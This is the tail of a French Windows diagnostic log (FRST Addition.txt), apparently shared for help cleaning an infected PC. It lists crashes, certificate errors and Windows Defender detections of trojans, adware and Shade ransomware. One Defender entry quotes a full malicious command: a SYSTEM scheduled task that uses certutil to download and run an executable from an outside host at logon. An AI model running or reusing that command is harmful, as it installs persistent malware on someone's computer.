ID de rapport : 885f3f53-8406-466e-8466-7343da7f413a

Nom complet du package défectueux : Microsoft.Windows.ShellExperienceHost_10.0.17763.1_neutral_neutral_cw5n1h2txyewy

ID de l'application relative à un package défectueux : App

Type de blocage : Quiesce

Error: (06/04/2019 07:11:39 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Le programme csgo.exe version 0.0.0.0 a cessé d'interagir avec Windows et a été fermé. Pour voir si plus d'informations sur le problème sont disponibles, vérifiez l'historique des problèmes dans le Panneau de configuration Sécurité et maintenance.

ID de processus : 2988

Heure de début : 01d51af83b03ee7e

Heure d'arrêt : 644

Chemin d'accès à l'application : E:\Programmes\Steam\steamapps\common\Counter-Strike Global Offensive\csgo.exe

ID de rapport : d1368d0a-c808-44e2-b772-7b71f0e3affd

Nom complet du package défectueux :

ID de l'application relative à un package défectueux :

Type de blocage : Unknown

Error: (06/04/2019 07:00:12 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Le programme SkypeApp.exe version 8.46.0.60 a cessé d'interagir avec Windows et a été fermé. Pour voir si plus d'informations sur le problème sont disponibles, vérifiez l'historique des problèmes dans le Panneau de configuration Sécurité et maintenance.

ID de processus : 1f18

Heure de début : 01d51af3b7f58299

Heure d'arrêt : 4294967295

Chemin d'accès à l'application : C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.46.60.0_x64__kzf8qxf38zg5c\SkypeApp.exe

ID de rapport : 0d69ff58-c0e5-4bf5-97a4-5415d1d62d6c

Nom complet du package défectueux : Microsoft.SkypeApp_14.46.60.0_x64__kzf8qxf38zg5c

ID de l'application relative à un package défectueux : App

Type de blocage : Quiesce

Error: (06/04/2019 06:38:29 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Le programme AvastUI.exe version 19.5.4444.0 a cessé d'interagir avec Windows et a été fermé. Pour voir si plus d'informations sur le problème sont disponibles, vérifiez l'historique des problèmes dans le Panneau de configuration Sécurité et maintenance.

ID de processus : 2558

Heure de début : 01d51af3bf717b9c

Heure d'arrêt : 6904

Chemin d'accès à l'application : C:\Program Files\AVAST Software\Avast\AvastUI.exe

ID de rapport : 5e48dacc-4573-4152-bfed-16d12c5227fa

Nom complet du package défectueux :

ID de l'application relative à un package défectueux :

Type de blocage : Unknown

Error: (06/04/2019 06:37:49 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nom de l’application défaillante Explorer.EXE, version : 10.0.17763.348, horodatage : 0x03d46193
Nom du module défaillant : ntdll.dll, version : 10.0.17763.475, horodatage : 0x3230aa04
Code d’exception : 0xc0000374
Décalage d’erreur : 0x00000000000fb049
ID du processus défaillant : 0x15e4
Heure de début de l’application défaillante : 0x01d51af3b5c65531
Chemin d’accès de l’application défaillante : C:\Windows\Explorer.EXE
Chemin d’accès du module défaillant: C:\Windows\SYSTEM32\ntdll.dll
ID de rapport : 998d124d-7db6-462e-a9d2-8a350ac1e03c
Nom complet du package défaillant :
ID de l’application relative au package défaillant :

Error: (06/04/2019 02:36:10 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nom de l’application défaillante Explorer.EXE, version : 10.0.17763.348, horodatage : 0x03d46193
Nom du module défaillant : ntdll.dll, version : 10.0.17763.475, horodatage : 0x3230aa04
Code d’exception : 0xc0000374
Décalage d’erreur : 0x00000000000fb049
ID du processus défaillant : 0x1664
Heure de début de l’application défaillante : 0x01d51a6d5c1f7105
Chemin d’accès de l’application défaillante : C:\Windows\Explorer.EXE
Chemin d’accès du module défaillant: C:\Windows\SYSTEM32\ntdll.dll
ID de rapport : 40c8bd3e-b167-4944-aa9e-d75cf446c064
Nom complet du package défaillant :
ID de l’application relative au package défaillant :

Error: (06/04/2019 02:14:55 AM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Le programme AvastUI.exe version 19.5.4444.0 a cessé d'interagir avec Windows et a été fermé. Pour voir si plus d'informations sur le problème sont disponibles, vérifiez l'historique des problèmes dans le Panneau de configuration Sécurité et maintenance.

ID de processus : 2b60

Heure de début : 01d51a6a1c9418f6

Heure d'arrêt : 25773

Chemin d'accès à l'application : C:\Program Files\AVAST Software\Avast\AvastUI.exe

ID de rapport : f7b348ed-56c0-4d8a-b1bc-d05e34a8f3b7

Nom complet du package défectueux :

ID de l'application relative à un package défectueux :

Type de blocage : Unknown

Error: (06/04/2019 02:10:08 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nom de l’application défaillante vtbdbvvh.exe, version : 2.4.4.6, horodatage : 0x5cefb9f6
Nom du module défaillant : vtbdbvvh.exe, version : 2.4.4.6, horodatage : 0x5cefb9f6
Code d’exception : 0xc0000409
Décalage d’erreur : 0x00035b55
ID du processus défaillant : 0x3600
Heure de début de l’application défaillante : 0x01d51a69da63b055
Chemin d’accès de l’application défaillante : C:\Users\Luca\AppData\Roaming\Microsoft\Windows\sdwjgejg\vtbdbvvh.exe
Chemin d’accès du module défaillant: C:\Users\Luca\AppData\Roaming\Microsoft\Windows\sdwjgejg\vtbdbvvh.exe
ID de rapport : 63bd1934-2a6c-4a73-8c1e-bdaead651820
Nom complet du package défaillant :
ID de l’application relative au package défaillant :

Erreurs système:
=============
Error: (06/05/2019 09:55:42 PM) (Source: Schannel) (EventID: 4108) (User: PC-DE-LUCA)
Description: Le certificat reçu du serveur distant n'a pas été validé correctement. Le code d'erreur est 0x80092012. Échec de la demande de connexion TLS. Les données associées contiennent le certificat de serveur.

Error: (06/05/2019 09:55:39 PM) (Source: DCOM) (EventID: 10010) (User: PC-DE-LUCA)
Description: Le serveur {9E175B6D-F52A-11D8-B9A5-505054503030} ne s’est pas enregistré sur DCOM avant la fin du temps imparti.

Error: (06/05/2019 09:55:05 PM) (Source: Schannel) (EventID: 4108) (User: PC-DE-LUCA)
Description: Le certificat reçu du serveur distant n'a pas été validé correctement. Le code d'erreur est 0x80092012. Échec de la demande de connexion TLS. Les données associées contiennent le certificat de serveur.

Error: (06/05/2019 09:55:00 PM) (Source: Schannel) (EventID: 4108) (User: PC-DE-LUCA)
Description: Le certificat reçu du serveur distant n'a pas été validé correctement. Le code d'erreur est 0x80092012. Échec de la demande de connexion TLS. Les données associées contiennent le certificat de serveur.

Error: (06/05/2019 09:54:46 PM) (Source: Schannel) (EventID: 4108) (User: PC-DE-LUCA)
Description: Le certificat reçu du serveur distant n'a pas été validé correctement. Le code d'erreur est 0x80092012. Échec de la demande de connexion TLS. Les données associées contiennent le certificat de serveur.

Error: (06/05/2019 09:54:46 PM) (Source: Schannel) (EventID: 4108) (User: PC-DE-LUCA)
Description: Le certificat reçu du serveur distant n'a pas été validé correctement. Le code d'erreur est 0x80092012. Échec de la demande de connexion TLS. Les données associées contiennent le certificat de serveur.

Error: (06/05/2019 09:53:39 PM) (Source: DCOM) (EventID: 10010) (User: PC-DE-LUCA)
Description: Le serveur {E48EDA45-43C6-48E0-9323-A7B2067D9CD5} ne s’est pas enregistré sur DCOM avant la fin du temps imparti.

Error: (06/05/2019 09:51:39 PM) (Source: DCOM) (EventID: 10010) (User: PC-DE-LUCA)
Description: Le serveur {9E175B6D-F52A-11D8-B9A5-505054503030} ne s’est pas enregistré sur DCOM avant la fin du temps imparti.

Windows Defender:
===================================
Date: 2019-06-04 02:01:52.845
Description:
Antivirus Windows Defender a détecté un logiciel malveillant ou potentiellement indésirable.
Pour plus d’informations, reportez-vous aux éléments suivants :
https://go.microsoft.com/fwlink/?linkid=37020&name=TrojanDownloader:Win32/Socelar&threatid=2147734469&enterprise=0
Nom : TrojanDownloader:Win32/Socelar
ID : 2147734469
Gravité : Grave
Catégorie : Cheval de Troie téléchargeur
Chemin : file:_C:\Users\Luca\AppData\Local\Temp\266812\ic-0.36f8c955369b88.exe
Origine de la détection : Ordinateur local
Type de détection : Concret
Source de détection : Protection en temps réel
Utilisateur : PC-DE-LUCA\Luca
Nom du processus : C:\Users\Luca\AppData\Local\Temp\Rar$EXb2992.33967\squeezehack.exe
Version de la signature : AV: 1.295.14.0, AS: 1.295.14.0, NIS: 0.0.0.0
Version du moteur : AM: 1.1.16000.6, NIS: 0.0.0.0

Date: 2019-06-04 02:01:50.847
Description:
Antivirus Windows Defender a détecté un logiciel malveillant ou potentiellement indésirable.
Pour plus d’informations, reportez-vous aux éléments suivants :
https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Ceprolad.A&threatid=2147726914&enterprise=0
Nom : Trojan:Win32/Ceprolad.A
ID : 2147726914
Gravité : Grave
Catégorie : Cheval de Troie
Chemin : CmdLine:_C:\Windows\System32\schtasks.exe /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR cmd.exe /C certutil.exe -urlcache -split -f http://nevernews.club/app/app.exe C:\Users\Luca\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Luca\AppData\Local\Temp\csrss\scheduled.exe /31340 /TN ScheduledUpdate /F
Origine de la détection : Inconnu
Type de détection : Concret
Source de détection : Système
Utilisateur : AUTORITE NT\Système
Nom du processus : Unknown
Version de la signature : AV: 1.295.14.0, AS: 1.295.14.0, NIS: 0.0.0.0
Version du moteur : AM: 1.1.16000.6, NIS: 0.0.0.0

Date: 2019-06-04 02:01:19.420
Description:
Antivirus Windows Defender a détecté un logiciel malveillant ou potentiellement indésirable.
Pour plus d’informations, reportez-vous aux éléments suivants :
https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/CryptInject&threatid=2147725859&enterprise=0
Nom : Trojan:Win32/CryptInject
ID : 2147725859
Gravité : Grave
Catégorie : Cheval de Troie
Chemin : file:_C:\Users\Luca\AppData\Local\Temp\uu35glec.00c\seescenicelfb.exe
Origine de la détection : Ordinateur local
Type de détection : Concret
Source de détection : Protection en temps réel
Utilisateur : PC-DE-LUCA\Luca
Nom du processus : C:\Users\Luca\AppData\Local\Temp\YLHXUI273Z\YLHX.exe
Version de la signature : AV: 1.295.14.0, AS: 1.295.14.0, NIS: 0.0.0.0
Version du moteur : AM: 1.1.16000.6, NIS: 0.0.0.0

Date: 2019-06-04 02:01:01.554
Description:
Antivirus Windows Defender a détecté un logiciel malveillant ou potentiellement indésirable.
Pour plus d’informations, reportez-vous aux éléments suivants :
https://go.microsoft.com/fwlink/?linkid=37020&name=Ransom:Win32/Shade.C&threatid=2147735695&enterprise=0
Nom : Ransom:Win32/Shade.C
ID : 2147735695
Gravité : Grave
Catégorie : Ransomware
Chemin : file:_C:\Users\Luca\AppData\Local\Temp\bjvieyra.1bh\netstream.exe; file:_C:\Users\Luca\AppData\Local\Temp\u5k1w5w0.ttd\netstream.exe
Origine de la détection : Ordinateur local
Type de détection : Concret
Source de détection : Protection en temps réel
Utilisateur : PC-DE-LUCA\Luca
Nom du processus : C:\Users\Luca\AppData\Local\Temp\YLHXUI273Z\YLHX.exe
Version de la signature : AV: 1.295.14.0, AS: 1.295.14.0, NIS: 0.0.0.0
Version du moteur : AM: 1.1.16000.6, NIS: 0.0.0.0

Date: 2019-06-04 02:00:58.370
Description:
Antivirus Windows Defender a détecté un logiciel malveillant ou potentiellement indésirable.
Pour plus d’informations, reportez-vous aux éléments suivants :
https://go.microsoft.com/fwlink/?linkid=37020&name=Adware:Win64/CloudGuard&threatid=250533&enterprise=0
Nom : Adware:Win64/CloudGuard
ID : 250533
Gravité : Élevée
Catégorie : Logiciel de publicité
Chemin : file:_C:\Program Files\Homeville\Homeville.exe
Origine de la détection : Ordinateur local
Type de détection : Concret
Source de détection : Protection en temps réel
Utilisateur : PC-DE-LUCA\Luca
Nom du processus : C:\Users\Luca\AppData\Local\Temp\is-J8HF5.tmp\Hermond.tmp
Version de la signature : AV: 1.295.14.0, AS: 1.295.14.0, NIS: 0.0.0.0
Version du moteur : AM: 1.1.16000.6, NIS: 0.0.0.0

Date: 2019-06-04 01:54:34.346
Description:
Antivirus Windows Defender a rencontré une erreur lors d la mise à jour des signatures.
Nouvelle version de la signature :
Version précédente de la signature : 1.283.1577.0
Source de mise à jour : Serveur Microsoft Update
Type de signature : Anti-virus
Type de mise à jour : Complet
Utilisateur : AUTORITE NT\Système
Version actuelle du moteur :
Version précédente du moteur : 1.1.15500.2
Code d’erreur : 0x80240022
Description de l’erreur : Le programme ne peut pas rechercher les mises à jour de définitions.

Date: 2019-06-04 01:54:34.345
Description:
Antivirus Windows Defender a rencontré une erreur lors d la mise à jour des signatures.
Nouvelle version de la signature :
Version précédente de la signature : 1.283.1577.0
Source de mise à jour : Serveur Microsoft Update
Type de signature : Anti-virus
Type de mise à jour : Complet
Utilisateur : AUTORITE NT\Système
Version actuelle du moteur :
Version précédente du moteur : 1.1.15500.2
Code d’erreur : 0x80240022
Description de l’erreur : Le programme ne peut pas rechercher les mises à jour de définitions.

CodeIntegrity:
===================================

Date: 2019-06-04 21:51:52.601
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\AVAST Software\Avast\wsc_proxy.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2019-06-04 21:51:52.599
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\AVAST Software\Avast\wsc_proxy.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2019-06-04 21:51:52.591
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\AVAST Software\Avast\wsc_proxy.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2019-06-04 21:51:52.589
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\AVAST Software\Avast\wsc_proxy.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2019-06-04 21:51:51.770
Description:
Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\SearchIndexer.exe) attempted to load \Device\HarddiskVolume4\ProgramData\Quoteex\Sailin.dll that did not meet the Microsoft signing level requirements.

Date: 2019-06-04 21:10:55.964
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\AVAST Software\Avast\wsc_proxy.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2019-06-04 21:10:55.962
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\AVAST Software\Avast\wsc_proxy.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2019-06-04 21:10:55.951
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\AVAST Software\Avast\wsc_proxy.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

==================== Infos Mémoire ===========================

BIOS: American Megatrends Inc. A.20 09/21/2018
Motherboard: Micro-Star International Co., Ltd B450-A PRO (MS-7B86)
Processeur: AMD Ryzen 5 2600 Six-Core Processor
Pourcentage de mémoire utilisée: 69%
Mémoire physique - RAM - totale: 8143.08 MB
Mémoire physique - RAM - disponible: 2515.27 MB
Mémoire virtuelle totale: 19919.08 MB
Mémoire virtuelle disponible: 10025.01 MB

==================== Lecteurs ================================

Drive c: () (Fixed) (Total:222.97 GB) (Free:2.5 GB) NTFS
Drive d: (PC136) (CDROM) (Total:6.88 GB) (Free:0 GB) UDF
Drive e: (Donnees) (Fixed) (Total:931.5 GB) (Free:551.89 GB) NTFS
Drive f: (My CDROM) (CDROM) (Total:0.01 GB) (Free:0 GB) CDFS

\\?\Volume{d40a1865-ed47-4c13-a2dc-df0bf8f6c155}\ (Récupération) (Fixed) (Total:0.49 GB) (Free:0.47 GB) NTFS
\\?\Volume{ad378aa8-6064-450e-abd2-065fc4bde4c1}\ () (Fixed) (Total:0.09 GB) (Free:0.07 GB) FAT32

==================== MBR & Table des partitions ==================

========================================================
Disk: 0 (Protective MBR) (Size: 223.6 GB) (Disk ID: 00000000)

Partition: GPT.

========================================================
Disk: 1 (Protective MBR) (Size: 931.5 GB) (Disk ID: 00000000)

Partition: GPT.

==================== Fin de Addition.txt ============================

Signaler le contenu de ce document